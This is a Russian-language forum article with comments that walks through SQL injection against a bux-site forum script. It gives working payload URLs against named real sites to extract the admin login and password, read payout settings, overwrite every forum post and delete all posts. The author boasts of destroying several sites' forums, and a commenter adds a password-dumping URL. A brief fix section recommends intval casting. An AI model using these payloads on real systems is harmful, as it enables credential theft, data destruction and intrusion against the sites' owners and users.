Бомбим форум в SeoEdit
Бомбим форум в SeoEdit
Итак, имеем форум, установлен он на хост, давайте посмотрим, что с ним можно сделать.

На данный момент здесь стоит кривой форум.

Что можно сделать:

1. SELECT:
1.1. http://seosprint.info/forum_posts.php?th=0'+union+select+1,2,3,4+--+
1.2. http://seosprint.info/forum_topic.php?gr='+union+select+1,2,3,4,5,6,7,8,9,10+--+
1.3. http://seosprint.info/forum_edit.php?post='+union+select+(SELECT+username+from+tb_users+where+user_status='admin'),2+--+

Выведенную цифру можно спокойно поменять на запрос, поставив его в скобки.

Примеры запросов:
SELECT+username+from+tb_users+where+user_status='admin' - берёт логин админа, username можно поменять на email или password. Что к чему вы разберётесь.

SELECT+price+from+tb_config+where+item='maxautopay' - выведем максимальную сумму для автоматической выплаты.

SELECT+payforad+from+tb_site+where+id=1 - если вывело 1 - значит включена выплата раз в сутки.

SELECT+x2+from+tb_site+where+id=1 - если выводит 1 - значит включены автовыплаты.

Другие запросы можно составить самим.

2. UPDATE:
В этом случае можно сделать массовую замену всех сообщений на форуме на свой текст. Пишем что-нить на форуме -> жмём редактировать -> открываем исходный код и ищем:
<input type="hidden" name="idgroupe" value="123" />

123 - номер вашего поста (ID), меняем в исходном коде его на:
' OR 1=1 -- '

Вводим текст и подтверждаем.

3. DELETE
Я так убил форум на clickid.ru, да и на goldenclic.ru и seosprint.info wink

Идём по ссылке: http://seosprint.info/forum_posts.php?delete='+or+1=1+--+ (у нас удалились все сообщения на форуме)

Фиксимся:

1. Проставим интвалы forum_posts.php:
$adse=($_GET["th"]);
$pagetemp=($_GET["page"]);

Перед скобками проставляем intval, сделать тоже самое во всех файлах форума.

Далее в forum_posts.php:
$id_dell=strip_tags($_GET["delete"]);

strip_tags => intval

Ещё ниже:
$id_post=strip_tags($_POST["idgroupe"]);

Аналогично меняем strip_tags на intval

Теперь открываем каждый файл и меняем оставшиеся strip_tags на limpiar.

И наконец самый главный фикс: ставим защиту от NGS, чтоб наверняка.

И теперь самый самый важный фикс - удаляем форум и букс заодно и ищем девушку да работаем на нормальной работе wink


Рубрика: Бесплатное » Дыры, ошибки   |   Автор: Alex   |   Просмотры: 6363
Комментариев: 0
Публикаций: 0
ICQ: --
- 0 +
  Автор: Hamit   |   Группа: Гости   |   Дата: 30 марта 2012  
Нихрена не понял,но плюсанул)
Комментариев: 121
Публикаций: 2
ICQ: 819374
- 118 +
  Автор: Rufus   |   Группа: Программисты   |   Дата: 30 марта 2012  
Все поняо, но минусонул)))
Да шучу я, плюсанул)
Комментариев: 338
Публикаций: 169
ICQ: 650073308
- 291 +
  Автор: Alex   |   Группа: Пользователи   |   Дата: 30 марта 2012  
чо непонятного?

регайся на seosprint.info потом иди по ссылке:
http://seosprint.info/forum_topic.php?gr=0%27+union+select+1,2,3,password,5,6,7,
8,9,10+from+tb_users+where+username=%27admin%27+--+
увидишь пас админа)
и всё)

он один хер пофиксит и поменяет

Rufus,
читеры блиать) надо владу зафиксить накрутку)чтоб не крутили все кому не лень :D
Комментариев: 117
Публикаций: 0
ICQ: 444249
- 482 +
  Автор: BITbOK   |   Группа: Модераторы   |   Дата: 30 марта 2012  
Цитата: Alex
он один хер пофиксит и поменяет

молодец...Давай я тебе помогу ломать гбуксы! Хотя 2 людей - это мало - нужно минимум 100.
Комментариев: 121
Публикаций: 2
ICQ: 819374
- 118 +
  Автор: Rufus   |   Группа: Программисты   |   Дата: 30 марта 2012  
Только что было 16, а теперь 15! Кто минусанул плять?
Комментариев: 338
Публикаций: 169
ICQ: 650073308
- 291 +
  Автор: Alex   |   Группа: Пользователи   |   Дата: 30 марта 2012  
кстати очень печально что бенчмарк не канает)
Комментариев: 338
Публикаций: 169
ICQ: 650073308
- 291 +
  Автор: Alex   |   Группа: Пользователи   |   Дата: 30 марта 2012  
я щас напишу потом на меня один или даже два человека очень очень сильно обидятся((( но статья будет стёбная :D внатуре приколетесь :D
Комментариев: 69
Публикаций: 4
ICQ: --
- 314 +
  Автор: gemiks   |   Группа: Модераторы   |   Дата: 30 марта 2012  
Alex,
мне нравятся твои статьи.Плюсанул.
Комментариев: 11
Публикаций: 0
ICQ: --
- 35 +
  Автор: ИльюхА   |   Группа: Пользователи   |   Дата: 30 марта 2012  
Осталось немного еще дырочек, дырка в новостях, дырка в письмах. Затем можно инъекцию провести когда сайт на профилактике. Так же через viewp.php можно шлепнуть
Комментариев: 338
Публикаций: 169
ICQ: 650073308
- 291 +
  Автор: Alex   |   Группа: Пользователи   |   Дата: 30 марта 2012  
про новости написал.погоди я много ещё чо не написал :D
Комментариев: 78
Публикаций: 2
ICQ: 438544012
- 123 +
  Автор: finbux.info   |   Группа: Пользователи   |   Дата: 30 марта 2012  
Alex,
(int) быстрее intval()
Комментариев: 207
Публикаций: 5
ICQ: 403746846
- 339 +
  Автор: BaMiS   |   Группа: Пользователи   |   Дата: 30 марта 2012  
finbux.info,
(int) быстрее intval(), но там в каком то месте было если переменная пустая, то одно иначе другое. А (int) всегда возвращает число, то есть при пустой строке вернёт 0, а intval() при пустой строке вернёт пустую строку
Комментариев: 338
Публикаций: 169
ICQ: 650073308
- 291 +
  Автор: Alex   |   Группа: Пользователи   |   Дата: 30 марта 2012  
Цитата: BaMiS
(int) быстрее intval(), но там в каком то месте было если переменная пустая, то одно иначе другое. А (int) всегда возвращает число, то есть при пустой строке вернёт 0, а intval() при пустой строке вернёт пустую строку

PIZDABOL

PIEACE DA BALL VO!
Комментариев: 738
Публикаций: 50
ICQ: --
- 4 +
  Автор: Green-wm   |   Группа: Пользователи   |   Дата: 30 марта 2012  
Цитата: finbux.info
Alex,
(int) быстрее intval()

facepalm А какой быстроте идёт речь? Эта ничтожная функция ваще неспособна вызывать какую-либо нагрузку...
Комментариев: 121
Публикаций: 2
ICQ: 819374
- 118 +
  Автор: Rufus   |   Группа: Программисты   |   Дата: 31 марта 2012  
Цитата: finbux.info
(int) быстрее intval()

Ты слышал что-то про внутреннею оптимизацию?
Давай рассмотрим пример в DelpHI, потому как в PHP там сложнее привести понятный пример.

И так, в delphi есть функция inc() - инкримент.
Так вот, что будет работать быстрее?

inc(a) или a++

Скажу сразу, inc(a)

Так же и у интерпритатора есть своя оптимизация.

Цитата: BaMiS
(int) быстрее intval(), но там в каком то месте было если переменная пустая, то одно иначе другое. А (int) всегда возвращает число, то есть при пустой строке вернёт 0, а intval() при пустой строке вернёт пустую строку


$t = (int)$_GET["id"]; - если id пустой вернет 0
$t = intval($_GET["id"]); - если id пустой вернет 0

Цитата: finbux.info
(int) быстрее intval()


Слушай, так ты тогда вообще не используй функции, пиши в процедурке все...

Не используй ereg и preg_match и им подобные, потому как самый простой ereg забирает времени в 1000 раз больше чем intval()

условие if(true) тоже жрет не мало по сравнению с intval();

А если интересно, то создай пустой цикл с 1000 оборотов, замерь время...

Потом добавь в цикл $i = $intval($i); и замерь еще раз, потом из второго времени вычти первое и ты сильно удивишься, когда увидишь, что 1000 intval() сожрало не более 0.001 секунды.

НЕ ПРОВОДИТЕ ТЕСТЫ НА ДЕНВЕРЕ!!! ОН НЕВЕРНО РАБОТАЕТ! НУЖНО ТЕСТИТЬ НА РЕАЛЬНОМ СЕРВАКЕ!

Цитата: Green-wm
А какой быстроте идёт речь? Эта ничтожная функция ваще неспособна вызывать какую-либо нагрузку...


Тот кто не работал с типизированными языками программирования тот не знает, что в любом языке есть типы данных, вот только интерпритатор PHP подтирает им попку и расставляет типы сам и приводит все к правельным типам данных.


Вот пример:

$a = 10; - это integer
$b = "5"; - это string

$a - $b = 5 // Бля, такого нет в языках программирования, это критическая ошибка.
Вы много чего не видите... Вы видите этот код так, а интерпритатор видит его так:
$a - (int)$b = 5
Он за вас все конвертирует и все делает!
Комментариев: 338
Публикаций: 169
ICQ: 650073308
- 291 +
  Автор: Alex   |   Группа: Пользователи   |   Дата: 31 марта 2012  
короч руфус всех нагнул)
Комментариев: 157
Публикаций: 11
ICQ: 643780703
- 461 +
  Автор: Pretorian   |   Группа: Программисты   |   Дата: 14 ноября 2012  
Напомнил про типы данных, есть целые и не целые типы данных :) Вспомнил делфи, начинал с делфи позже в с++ перешел, но делфи легко учиться и без лишних понтов тем она мне и нравилась тогда :)
Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.